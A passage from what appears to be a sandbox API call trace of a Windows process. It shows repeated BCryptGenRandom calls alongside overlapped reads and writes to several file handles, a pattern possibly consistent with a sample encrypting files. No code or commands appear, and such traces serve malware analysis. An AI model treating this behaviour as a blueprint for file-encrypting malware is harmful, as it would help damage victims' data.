lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0168.179] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0168.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0168.189] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.189] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.189] free (_Block=0x3e305b8) [0168.189] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.189] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.189] free (_Block=0x1fa91d0) [0168.189] free (_Block=0x1fa2ed8) [0168.189] free (_Block=0x1fa90b8) [0168.189] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0168.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0168.198] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.199] free (_Block=0x3e305b8) [0168.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.199] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.199] free (_Block=0x1fa91d0) [0168.199] free (_Block=0x1fa2ed8) [0168.199] free (_Block=0x1fa90b8) [0168.199] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0168.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0170.988] CloseHandle (hObject=0x308) returned 1 [0170.988] free (_Block=0x3d70450) [0170.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.429] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x3c80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.445] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.445] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.445] free (_Block=0x3e305b8) [0173.445] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.445] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.446] free (_Block=0x1fa91d0) [0173.446] free (_Block=0x1fa2ed8) [0173.446] free (_Block=0x1fa90b8) [0173.446] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0173.446] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.454] CloseHandle (hObject=0x3cc) returned 1 [0173.454] free (_Block=0x3e70008) [0173.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.465] ReadFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x7450, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0173.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.485] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.485] free (_Block=0x3e305b8) [0173.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.485] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.485] free (_Block=0x1fa91d0) [0173.485] free (_Block=0x1fa2ed8) [0173.485] free (_Block=0x1fa90b8) [0173.485] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.736] CloseHandle (hObject=0xec) returned 1 [0173.736] free (_Block=0x3e70008) [0173.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.740] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.746] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.748] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.748] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.748] free (_Block=0x3e305b8) [0173.748] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.748] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.748] free (_Block=0x1fa91d0) [0173.748] free (_Block=0x1fa2ed8) [0173.748] free (_Block=0x1fa90b8) [0173.748] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.763] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1268, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.786] CloseHandle (hObject=0x170) returned 1 [0173.786] free (_Block=0x1ff1e60) [0173.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.796] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.796] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.796] free (_Block=0x3e305b8) [0173.796] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.796] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.796] free (_Block=0x1fa91d0) [0173.796] free (_Block=0x1fa2ed8) [0173.796] free (_Block=0x1fa90b8) [0173.796] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0173.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.806] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.806] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.806] free (_Block=0x3e305b8) [0173.806] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.807] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.807] free (_Block=0x1fa91d0) [0173.807] free (_Block=0x1fa2ed8) [0173.807] free (_Block=0x1fa90b8) [0173.807] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.808] CloseHandle (hObject=0x308) returned 1 [0173.808] free (_Block=0x3df0008) [0173.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.808] CloseHandle (hObject=0x170) returned 1 [0173.808] free (_Block=0x1ff1e60) [0173.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.810] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x20e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0173.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.811] CloseHandle (hObject=0x338) returned 1 [0173.811] free (_Block=0x3e70008) [0173.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.821] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.822] CloseHandle (hObject=0xec) returned 1 [0173.822] free (_Block=0x3d70450) [0173.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.847] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.847] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.847] free (_Block=0x3e305b8) [0173.847] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.847] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.847] free (_Block=0x1fa91d0) [0173.847] free (_Block=0x1fa2ed8) [0173.847] free (_Block=0x1fa90b8) [0173.847] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.851] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.858] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.858] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.858] free (_Block=0x3e305b8) [0173.858] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.858] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.858] free (_Block=0x1fa91d0) [0173.858] free (_Block=0x1fa2ed8) [0173.858] free (_Block=0x1fa90b8) [0173.858] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.870] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.877] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x138c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.891] CloseHandle (hObject=0x338) returned 1 [0173.891] free (_Block=0x1ff1e60) [0173.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.902] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x36aa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.915] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7a80, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.927] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4754, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0173.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0173.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0173.944] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.944] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.944] free (_Block=0x3e305b8) [0173.944] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.944] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.944] free (_Block=0x1fa91d0) [0173.944] free (_Block=0x1fa2ed8) [0173.944] free (_Block=0x1fa90b8) [0173.944] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0173.944] GetQueuedCompletionStatus (in: 